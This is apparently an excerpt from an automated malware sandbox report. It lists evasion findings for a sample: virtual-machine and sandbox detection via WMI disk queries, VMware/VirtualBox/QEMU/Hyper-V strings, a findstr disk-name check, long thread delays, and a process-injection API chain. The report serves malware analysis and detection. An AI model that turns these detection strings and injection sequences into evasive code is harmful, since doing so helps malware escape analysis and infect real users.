Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dllhost.exe

Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,

38_2_0000000140001868

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxMiniRdrDN

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4320	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5554	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6009
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3777
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3190
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5007
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2046
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 456
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 403
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 379
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 373
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 1708
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 446
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 368
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 363

Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess	graph_35-245
Source: C:\Windows\System32\cmd.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_19-16840
Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\winlogon.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Source: C:\Windows\System32\dllhost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\System32\cmd.exe	API coverage: 4.5 %
Source: C:\Windows\System32\conhost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\conhost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exe	API coverage: 9.1 %
Source: C:\Windows\System32\lsass.exe	API coverage: 9.4 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.1 %
Source: C:\Windows\System32\dwm.exe	API coverage: 9.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.3 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.5 %
Source: C:\Windows\System32\wbem\WMIADAP.exe	API coverage: 8.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.1 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208	Thread sleep count: 4320 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208	Thread sleep count: 5554 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144	Thread sleep count: 6009 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144	Thread sleep count: 3777 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1360	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6228	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5852	Thread sleep count: 5007 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 984	Thread sleep count: 2046 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5824	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 4428	Thread sleep count: 287 > 30
Source: C:\Windows\System32\dllhost.exe TID: 2484	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6640	Thread sleep count: 456 > 30
Source: C:\Windows\System32\winlogon.exe TID: 6640	Thread sleep time: -45600s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 2344	Thread sleep count: 273 > 30
Source: C:\Windows\System32\svchost.exe TID: 4948	Thread sleep count: 403 > 30
Source: C:\Windows\System32\svchost.exe TID: 4948	Thread sleep time: -40300s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 1236	Thread sleep count: 201 > 30
Source: C:\Windows\System32\svchost.exe TID: 3616	Thread sleep count: 379 > 30
Source: C:\Windows\System32\svchost.exe TID: 3616	Thread sleep time: -37900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5448	Thread sleep count: 373 > 30
Source: C:\Windows\System32\svchost.exe TID: 5448	Thread sleep time: -37300s >= -30000s
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 3228	Thread sleep count: 1708 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 3228	Thread sleep count: 446 > 30
Source: C:\Windows\System32\svchost.exe TID: 6108	Thread sleep count: 368 > 30
Source: C:\Windows\System32\svchost.exe TID: 6108	Thread sleep time: -36800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5576	Thread sleep count: 363 > 30
Source: C:\Windows\System32\svchost.exe TID: 5576	Thread sleep time: -36300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1880	Thread sleep count: 300 > 30
Source: C:\Windows\System32\svchost.exe TID: 1880	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2124	Thread sleep count: 342 > 30
Source: C:\Windows\System32\svchost.exe TID: 2124	Thread sleep time: -34200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6024	Thread sleep count: 298 > 30
Source: C:\Windows\System32\svchost.exe TID: 3744	Thread sleep count: 322 > 30
Source: C:\Windows\System32\svchost.exe TID: 3744	Thread sleep time: -32200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3264	Thread sleep count: 323 > 30
Source: C:\Windows\System32\svchost.exe TID: 3264	Thread sleep time: -32300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6240	Thread sleep count: 306 > 30
Source: C:\Windows\System32\svchost.exe TID: 6240	Thread sleep time: -30600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6336	Thread sleep count: 309 > 30
Source: C:\Windows\System32\svchost.exe TID: 6336	Thread sleep time: -30900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6380	Thread sleep count: 306 > 30
Source: C:\Windows\System32\svchost.exe TID: 6380	Thread sleep time: -30600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6448	Thread sleep count: 300 > 30
Source: C:\Windows\System32\svchost.exe TID: 6448	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6516	Thread sleep count: 299 > 30
Source: C:\Windows\System32\svchost.exe TID: 6688	Thread sleep count: 294 > 30

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\wbem\WMIADAP.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390D894 FindFirstFileExW,	19_2_000002241390D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_000002241390DA18
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393D894 FindFirstFileExW,	19_2_000002241393D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_000002241393DA18
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000002BCD7E3DA18
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3D894 FindFirstFileExW,	20_2_000002BCD7E3D894
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	37_2_0000026504EADA18
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EAD894 FindFirstFileExW,	37_2_0000026504EAD894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACD894 FindFirstFileExW,	38_2_0000025DC1ACD894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_0000025DC1ACDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CED894 FindFirstFileExW,	38_2_0000025DC1CED894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_0000025DC1CEDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64D894 FindFirstFileExW,	39_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67D894 FindFirstFileExW,	39_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	40_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AED894 FindFirstFileExW,	40_2_00000202C0AED894
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130D894 FindFirstFileExW,	41_2_000002A66130D894
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCD894 FindFirstFileExW,	42_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000002BAAEE4DA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4D894 FindFirstFileExW,	42_2_000002BAAEE4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CD894 FindFirstFileExW,	43_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	43_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4D894 FindFirstFileExW,	43_2_0000026A87F4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	43_2_0000026A87F4DA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	44_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537AD894 FindFirstFileExW,	44_2_00000179537AD894
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	44_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DD894 FindFirstFileExW,	44_2_00000179537DD894
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	45_2_0000016CE653DA18
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653D894 FindFirstFileExW,	45_2_0000016CE653D894
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	46_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56D894 FindFirstFileExW,	46_2_000002295D56D894

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: Amcache.hve.10.dr	Binary or memory string: VMware
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxsf.sys
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: VMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: svchost.exe, 00000030.00000002.3005591334.000001845AC2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: Amcache.hve.10.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: cmd.exe, 00000013.00000003.2083609583.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085257031.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085855678.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2084489555.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2084133578.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2086602704.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2082690674.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085736368.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2082095231.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2081856239.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2086221722.0000022413295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0T2B0A" /c:"QEMU HARDDISK" K
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.50.dr	Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000029.00000000.2461945844.000002A66062A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.50.dr	Binary or memory string: VMCI: Using capabilities (0x1c).
Source: Amcache.hve.10.dr	Binary or memory string: vmci.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: cmd.exe, 00000013.00000003.2069301255.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2069201279.0000022413295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: qemuwmi2y
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000032.00000000.2526982413.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3012792794.000001D55862B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Time Synchronization Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmusrvc2y
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: svchost.exe, 00000032.00000000.2531567610.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: dowvmci
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: VMware
Source: Amcache.hve.10.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual RAM
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.50.dr	Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: Amcache.hve.10.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxguest.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmmouse.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: Amcache.hve.10.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual USB Mouse
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.10.dr	Binary or memory string: VMware, Inc.
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: QEMU HARDDISK
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxmouse.sys
